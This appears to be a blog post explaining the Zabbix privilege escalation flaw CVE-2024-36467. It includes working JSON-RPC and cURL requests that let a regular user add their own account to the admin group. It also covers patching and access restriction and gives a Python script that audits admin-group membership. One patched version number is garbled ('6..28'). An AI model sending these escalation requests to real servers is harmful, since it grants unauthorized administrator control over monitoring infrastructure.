Zabbix is a popular, open-source monitoring platform widely used in IT environments. In June 2024, a critical security vulnerability, CVE-2024-36467, was disclosed. Simply put, a user with ordinary API access can add themselves to powerful admin groups with just a few API calls.

This post will break down the vulnerability, walk through the steps to exploit it, and explain why it matters—using easy, direct language. We’ll also provide links to the original references and show you sample request payloads you could use.

Severity: High (Privilege Escalation)

- Who’s at Risk: Any Zabbix environment where users have access to the user.update API endpoint (which includes the default "User" role in many cases).
- What’s Possible: A normal user can add themselves to *any* group (except those specifically restricted), gaining administrator rights.

References

- Zabbix Security Advisory
- Zabbix GitHub Issue

🩺 How the Vulnerability Works

Zabbix offers an API endpoint called user.update meant for, among other things, letting users update their details (like their email).

The Problem: The API does NOT properly check permissions when you ask to put yourself in another group. If you can access the API, you can just say, "Hey Zabbix, I'm an admin now"—and it works.

You don’t even need to be an admin (yet)!
Just an authenticated (logged-in) user with API access.

🛠️ Exploit Walkthrough

Let’s see exactly how an attacker would use this flaw.

To use the API, you'll need your own user ID. You can grab this via the API (on Zabbix 5.4 and later the user object field is called "username" rather than "alias", so adjust the filter accordingly):

POST /api_jsonrpc.php
{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "output": "extend",
        "filter": {
            "alias": "your_username"
        }
    },
    "auth": "YOUR_AUTH_TOKEN",
    "id": 1
}

Call the usergroup.get endpoint to list all user groups and note the usrgrpid of the admin group:

POST /api_jsonrpc.php
{
    "jsonrpc": "2.0",
    "method": "usergroup.get",
    "params": {
        "output": "extend"
    },
    "auth": "YOUR_AUTH_TOKEN",
    "id": 2
}

Now you just need to update your own user and add the admin group (replace "8" below with the admin group's usrgrpid from the previous step; JSON does not allow inline comments, so the value must stand alone):

POST /api_jsonrpc.php
{
    "jsonrpc": "2.0",
    "method": "user.update",
    "params": {
        "userid": "YOUR_USER_ID",
        "usrgrps": [
            "8"
        ]
    },
    "auth": "YOUR_AUTH_TOKEN",
    "id": 3
}

If this request works, congratulations—you’re an admin now!

- *If the group has “disabled” or “restricted GUI access” set, it probably won’t work. But most environments don’t use that.*

💥 In-Depth Example with cURL

# Login and get the auth token (the "result" field of the response is the token)
curl -s -X POST http://zabbix.example.com/api_jsonrpc.php \
-H 'Content-Type: application/json' \
-d '{
  "jsonrpc": "2.0",
  "method": "user.login",
  "params": {
    "user": "normal_user",
    "password": "userpassword"
  },
  "id": 1
}'

# Use the auth token from the login response in this request to escalate
curl -s -X POST http://zabbix.example.com/api_jsonrpc.php \
-H 'Content-Type: application/json' \
-d '{
    "jsonrpc": "2.0",
    "method": "user.update",
    "params": {
        "userid": "3",
        "usrgrps": ["8"]
    },
    "auth": "YOUR_AUTH_TOKEN",
    "id": 2
}'

All regular users with API access can become full admins!

- Attackers who compromise a Zabbix user account (via password spray, phishing, etc.) can instantly escalate—no other bugs needed.
- This defeats many internal threat models and makes data exfiltration, service disruption, or lateral movement trivial.

🔐 Mitigation

1. Patch Immediately: Zabbix released fixes (6..28/6.4.11 and above). See the official Zabbix advisory for the exact fixed versions for your branch.
2. Restrict API access: Use the "User role" permission system to control which users can call user.update, and review which roles currently have API access at all.
3. Audit group membership: Compare the members of privileged groups (e.g. Zabbix administrators) against what you expect, and review the Zabbix audit log for user.update calls made by non-admin accounts.
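The following is an added example, not code from the post or from the Zabbix project, of the detective control that complements patching: a small Python audit that reads usergroup.get with selectUsers and diffs the membership of privileged groups against a baseline you maintain, so an account that has added itself to an admin group shows up as drift. The host URL, the group and user names, and the sample API response are constructed for the example; the request-building helper also emits the `"jsonrpc": "2.0"` version string the Zabbix API expects.

```python
import json
import urllib.request

# Hypothetical endpoint, matching the host used in the post's cURL examples.
ZABBIX_URL = "http://zabbix.example.com/api_jsonrpc.php"


def rpc_request(method, params, auth=None, req_id=1):
    """Build a Zabbix JSON-RPC request body. The version string must be "2.0"."""
    body = {"jsonrpc": "2.0", "method": method, "params": params, "id": req_id}
    if auth is not None:
        body["auth"] = auth
    return body


def zabbix_call(url, body):
    """POST a request body and return its "result" member (needs network; not run offline)."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        reply = json.load(resp)
    if "error" in reply:
        raise RuntimeError(f"Zabbix API error: {reply['error']}")
    return reply["result"]


def username_of(user):
    """Zabbix 5.4+ reports "username"; older releases report "alias"."""
    return user.get("username") or user.get("alias")


def group_members(groups):
    """Map group name -> set of member usernames from a usergroup.get result
    that was fetched with selectUsers."""
    return {g["name"]: {username_of(u) for u in g.get("users", [])} for g in groups}


def find_membership_drift(groups, baseline):
    """Compare the actual membership of each group named in `baseline` with its
    expected member set. Returns {group: sorted unexpected usernames}; groups
    with no unexpected members are omitted, so an empty dict means "clean"."""
    actual = group_members(groups)
    drift = {}
    for name, expected in baseline.items():
        unexpected = actual.get(name, set()) - set(expected)
        if unexpected:
            drift[name] = sorted(unexpected)
    return drift


# Constructed sample: roughly what usergroup.get returns after the escalation
# described in the post, where the regular account has added itself to usrgrpid 8.
SAMPLE_GROUPS = [
    {
        "usrgrpid": "8",
        "name": "Zabbix administrators",
        "users": [
            {"userid": "1", "username": "Admin"},
            {"userid": "3", "username": "normal_user"},
        ],
    },
    {"usrgrpid": "9", "name": "Guests", "users": [{"userid": "2", "username": "guest"}]},
]

# Baseline kept under version control: who is supposed to be in each privileged group.
BASELINE = {"Zabbix administrators": {"Admin"}}


def audit_live(url, auth):
    """Fetch the real groups with an existing auth token and run the comparison."""
    groups = zabbix_call(
        url,
        rpc_request(
            "usergroup.get",
            {"output": ["usrgrpid", "name"], "selectUsers": "extend"},
            auth=auth,
        ),
    )
    return find_membership_drift(groups, BASELINE)


if __name__ == "__main__":
    # Offline run on the constructed sample; flags the self-added account.
    print(find_membership_drift(SAMPLE_GROUPS, BASELINE))
```

Run the offline check as-is, or call `audit_live(ZABBIX_URL, token)` from a scheduled job with a read-only token and alert on any non-empty result. Diffing against a baseline rather than against role type is deliberate: the escalation changes the usrgrps list, not the user's role, so a role-based check alone would miss it.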

📝 Original References

- Zabbix Security Advisory (ZBX-24602)
- GitHub Issue #610
- Zabbix Documentation - Permissions

Conclusion

CVE-2024-36467 is a textbook privilege escalation flaw: with a couple of standard API calls, any authenticated user can become an administrator—with all the risks that implies.

*Stay safe, and patch fast!*

*Post by an independent Zabbix security enthusiast*

Timeline

Published on: 11/27/2024 07:15:09 UTC